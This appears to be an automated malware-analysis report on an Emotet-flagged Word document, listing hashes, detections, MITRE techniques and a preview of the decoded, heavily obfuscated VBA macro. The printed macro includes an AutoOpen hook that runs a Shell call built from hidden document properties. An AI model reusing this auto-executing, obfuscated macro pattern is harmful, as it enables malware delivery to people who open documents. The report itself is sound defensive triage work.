Emotet Office (OLE) malware analysis — malicious · 71cc8b291e0a1ad3

MALICIOUS

Office (OLE)

70.5 KB Created: 2017-09-21 05:52:00 Authoring application: Microsoft Office Word First seen: 2017-10-10

MD5: 406923061b24da64acf5e0bb95f016e2 SHA-1: e972b212304ecb074cc9e9ded6deebc9df35ddbc SHA-256: 71cc8b291e0a1ad38ed9142eb112f56c4a8a3eb00d130bfa27e5c40a08bc9e43

172 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6344335-3. Heuristics indicate the presence of VBA macros, including an AutoOpen macro and a potential Shell call, suggesting it's designed to execute code. The VBA script, though obfuscated, likely attempts to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Public Function HcALMEXx()
VBA.Shell$ "" + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.CustomDocumentProperties("VkUWzFneZ") + ActiveDocument.CustomDocumentProperties("NxvxRKWp") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.BuiltInDocumentProperties("Comments") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZs …
End Function

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
HcALMEXx
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7303 bytes
SHA-256: `efaefb86f1eca7ddb7eebf9de4c60d6f88ae35fc6ad380a8bb63e41990dab6d4`
Detection ClamAV: No threats found Obfuscation or payload: likely 140 of 185 identifiers look randomly generated (e.g. 'xrRbWxYCzfh') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Public Function YpPwgzEvc() As Integer GvHxKDNB = 3957 zWyESfdK = bkCcwPP vzSCkZd = Asc(zWyESfdK) If GvHxKDNB > vzSCkZd Then For XTMRSwA = 363 To 3662 sGBURLVuh = vzSCkZd + XTMRSwA Next XTMRSwA sGBURLVuh = sGBURLVuh + GvHxKDNB VsmNFtAgU = CStr(sGBURLVuh) LhBSENBa = Mid(VsmNFtAgU, 2107, 8657) hwpSFwZK = hwpSFwZK & "3843" YpPwgzEvc = CInt(Mid(hwpSFwZK, 1130, 3720)) Else YpPwgzEvc = 225 + 8399 + 4030 + 8993 / 9664 / 3050 / 6690 - 7314 - 3175 - 8233 + 8505 + 715 MsgBox ("NGaWVdgRpx") MsgBox ("LDrsekuhAFC") MsgBox ("sFpWTDVPkV") MsgBox ("SpRdfzBtz") MsgBox ("fmzGfwFhk") End Function Public Function shwaAXNWw() As Integer BaTtDnYp = 4298 DsNdSBy = xrRbWxYCzfh RPtnbaE = Asc(DsNdSBy) If BaTtDnYp > RPtnbaE Then For hZyzVanMT = 2250 To 6869 gcMFMNeZdG = RPtnbaE + hZyzVanMT Next hZyzVanMT gcMFMNeZdG = gcMFMNeZdG + BaTtDnYp WAmRrhdgD = CStr(gcMFMNeZdG) uvmCBuH = Mid(WAmRrhdgD, 829, 4370) aENvagug = aENvagug & "7086" shwaAXNWw = CInt(Mid(aENvagug, 1305, 4967)) Else shwaAXNWw = 3118 + 3719 + 1730 / 163 / 7611 - 1262 - 3054 - 4199 + 6224 + 3306 MsgBox ("EdtXCkrX") MsgBox ("DtpPURzVFma") MsgBox ("ecZpCDVmhut") MsgBox ("GnutKzNv") End Function Public Function pyDUNNcRv() As Integer wmRcYCTDCr = 6292 ntcUsGKR = xEUZHGXadR tcEEcLDpBy = Asc(ntcUsGKR) If wmRcYCTDCr > tcEEcLDpBy Then For wZwxXgu = 1898 To 7071 tUCRYahF = tcEEcLDpBy + wZwxXgu Next wZwxXgu tUCRYahF = tUCRYahF + wmRcYCTDCr htHEswBZ = CStr(tUCRYahF) rgwceaAtRC = Mid(htHEswBZ, 2951, 5699) HHnZPET = HHnZPET & "4190" pyDUNNcRv = CInt(Mid(HHnZPET, 878, 4102)) Else pyDUNNcRv = 3132 + 301 + 2700 / 8196 / 8362 / 6461 - 359 - 2308 + 5248 + 8612 + 9341 MsgBox ("DNtHLatXT") MsgBox ("GfRSfBD") MsgBox ("ffVkshSVwZ") MsgBox ("cgXhrDwuKwC") MsgBox ("entpTzThWD") MsgBox ("DDztNNFNGH") MsgBox ("CkBYMuY") End Function Public Function WRPdzLTXcvt() As Integer yXCNDPFep = 5105 BzcrBYfS = NbUZNdHnF VhpdWtv = Asc(BzcrBYfS) If yXCNDPFep > VhpdWtv Then For xUrEWUhUMy = 1009 To 5421 rzmAunCXt = VhpdWtv + xUrEWUhUMy Next xUrEWUhUMy rzmAunCXt = rzmAunCXt + yXCNDPFep LeNygXMKpkR = CStr(rzmAunCXt) mXknfNMn = Mid(LeNygXMKpkR, 2976, 7798) bdhdgrLT = bdhdgrLT & "8559" WRPdzLTXcvt = CInt(Mid(bdhdgrLT, 1236, 5446)) Else WRPdzLTXcvt = 7360 + 2761 + 5747 + 9689 / 6803 / 1906 - 175 - 6512 - 429 + 1919 + 8369 + 9475 MsgBox ("wkcafCCwS") MsgBox ("pWPzhumUX") MsgBox ("wtzBNCNVtaU") MsgBox ("empRzcuK") MsgBox ("EuLfkVMZuaT") MsgBox ("UxWyZREVz") End Function Public Function eaBHuuGzSL() As Integer weuFyYhVLA = 6615 aYpswDnbfX = nyXsuWMMEGW pvYnVawkKB = Asc(aYpswDnbfX) If weuFyYhVLA > pvYnVawkKB Then For TnCUrTUp = 1728 To 5281 BdSUKsXAAUz = pvYnVawkKB + TnCUrTUp Next TnCUrTUp BdSUKsXAAUz = BdSUKsXAAUz + weuFyYhVLA MHsPvZMDD = CStr(BdSUKsXAAUz) euekFdK = Mid(MHsPvZMDD, 1128, 7623) cdEkVkabcP = cdEkVkabcP & "3688" eaBHuuGzSL = CInt(Mid(cdEkVkabcP, 2371, 6485)) Else eaBHuuGzSL = 5203 + 6346 + 7165 + 1875 / 9073 / 8861 - 2526 - 8802 - 7312 + 3010 + 4348 + 9167 MsgBox ("uYSTmuXfnMa") MsgBox ("AcWmpbxEsyV") MsgBox ("GPUAxHPMRsg") End Function Sub autoopen() HcALMEXx End Sub Public Function HcALMEXx() VBA.Shell$ "" + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.CustomDocumentProperties("VkUWzFneZ") + ActiveDocument.CustomDocumentProperties("NxvxRKWp") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + ActiveDocument.BuiltInDocumentProperties("Comments") + FbTXSGBH + UMSNSBnhK + bCWUZpU + MMgywSU + ugKeBfYuZR + wKfmpPTN + CPHUHXAL + pMvKXAWLU + TsffZsSF + BgkKVKXM + sxgxSCU, 0 End Function Public Function sPryuWap() As Integer rXuYUSHs = 7980 hkAghyEh = AUSpKuEZDs yvKzWuNANM = Asc(hkAghyEh) If rXuYUSHs > yvKzWuNANM Then For DedDVnmR = 3055 To 5493 vSvruMb = yvKzWuNANM + DedDVnmR Next DedDVnmR vSvruMb = vSvruMb + rXuYUSHs zRKZNVPXu = CStr(vSvruMb) EkNmNvef = Mid(zRKZNVPXu, 3030, 5891) tmyDFMGy = tmyDFMGy & "2320" sPryuWap = CInt(Mid(tmyDFMGy, 691, 9962)) Else sPryuWap = 9368 + 3052 + 2568 + 9586 / 1628 / 2394 - 8607 - 2516 + 4377 + 2833 MsgBox ("wcsUwHpF") MsgBox ("EuzacEk") MsgBox ("aEVgbxUdutZ") MsgBox ("BsEKCsagFBV") MsgBox ("rcYeZFZY") MsgBox ("BAGPBdamfu") MsgBox ("CtGVgXP") MsgBox ("aBGLwWKadm") End Function Public Function BxXNANWBvA() As Integer bWYPhkS = 3251 PPDXVzhVs = xhhXRpNft TwBVvdfnLe = Asc(PPDXVzhVs) If bWYPhkS > TwBVvdfnLe Then For ZktdEkcktBp = 3395 To 5918 xZFsBYVCd = TwBVvdfnLe + ZktdEkcktBp Next ZktdEkcktBp xZFsBYVCd = xZFsBYVCd + bWYPhkS PCRSaPmZn = CStr(xZFsBYVCd) yuHAzSKpv = Mid(PCRSaPmZn, 1357, 5745) WZUYGbRr = WZUYGbRr & "640" BxXNANWBvA = CInt(Mid(WZUYGbRr, 1918, 4636)) Else BxXNANWBvA = 6295 + 1289 + 1307 / 974 / 4118 / 3753 - 3457 - 1582 - 5741 + 8159 + 7592 + 1983 MsgBox ("HzYrtzMyW") MsgBox ("ZmcxEvb") MsgBox ("fscRcRPExc") MsgBox ("xXSrHCvMmh") End Function Public Function UFsGREUwYS() As Integer dCVwzLDYm = 1143 mbRDTtNtaX = aCtBdTkdzF REFxgUXeN = Asc(mbRDTtNtaX) If dCVwzLDYm > REFxgUXeN Then For yWGDHYBk = 211 To 5321 aExCCefP = REFxgUXeN + yWGDHYBk Next yWGDHYBk aExCCefP = aExCCefP + dCVwzLDYm xSHxLFM = CStr(aExCCefP) aLEPeLLDSFv = Mid(xSHxLFM, 2624, 4136) uKuCMUXC = uKuCMUXC & "1639" UFsGREUwYS = CInt(Mid(uKuCMUXC, 993, 4288)) Else UFsGREUwYS = 5560 + 1895 + 2965 + 7961 / 3668 / 95 - 8874 - 364 + 9651 + 1699 MsgBox ("kAEYGgmBg") MsgBox ("FdptnhNSVy") MsgBox ("wRGNVVuZc") MsgBox ("TUTKHLC") End Function Public Function NecKThDbzB() As Integer YFRTRTLHF = 7230 dkGMBgpAU = UPydfPVk sHdufdNw = Asc(dkGMBgpAU) If YFRTRTLHF > sHdufdNw Then For ahCLydfH = 80 To 9489 PCmpRHg = sHdufdNw + ahCLydfH Next ahCLydfH PCmpRHg = PCmpRHg + YFRTRTLHF dKLKzWv = CStr(PCmpRHg) UGnzfgD = Mid(dKLKzWv, 1402, 8244) neDHakPkW = neDHakPkW & "9640" NecKThDbzB = CInt(Mid(neDHakPkW, 1275, 6430)) Else NecKThDbzB = 1930 + 233 + 9584 + 8253 / 8989 / 8689 / 2787 - 6410 - 9871 - 200 + 8054 + 2808 MsgBox ("vWWUdVLhxFU") MsgBox ("pepnfZdNuHm") MsgBox ("rsNcvHRr") MsgBox ("KGXBbaKveD") MsgBox ("KwbULpaChcK") MsgBox ("WkfudASDCEW") End Function Public Function eRHwYkBRbDz() As Integer vNWaWGu = 5993 nGgFGfNrnvv = kHGuRrhs CmMuTFVsyK = Asc(nGgFGfNrnvv) If vNWaWGu > CmMuTFVsyK Then For CUrUzSfafZP = 2853 To 5923 CgraTkgxkrH = CmMuTFVsyK + CUrUzSfafZP Next CUrUzSfafZP CgraTkgxkrH = CgraTkgxkrH + vNWaWGu pMYKKyv = CStr(CgraTkgxkrH) KgReHrYk = Mid(pMYKKyv, 2673, 6638) PLVENfv = PLVENfv & "768" eRHwYkBRbDz = CInt(Mid(PLVENfv, 791, 8410)) Else eRHwYkBRbDz = 9682 + 3950 + 8166 + 4565 / 3976 / 5734 / 6571 - 5009 - 6599 + 7676 + 7031 MsgBox ("pwuDnNU") MsgBox ("DUbUyeY") End Function

Open this report in the interactive analyzer, or submit your own file for analysis.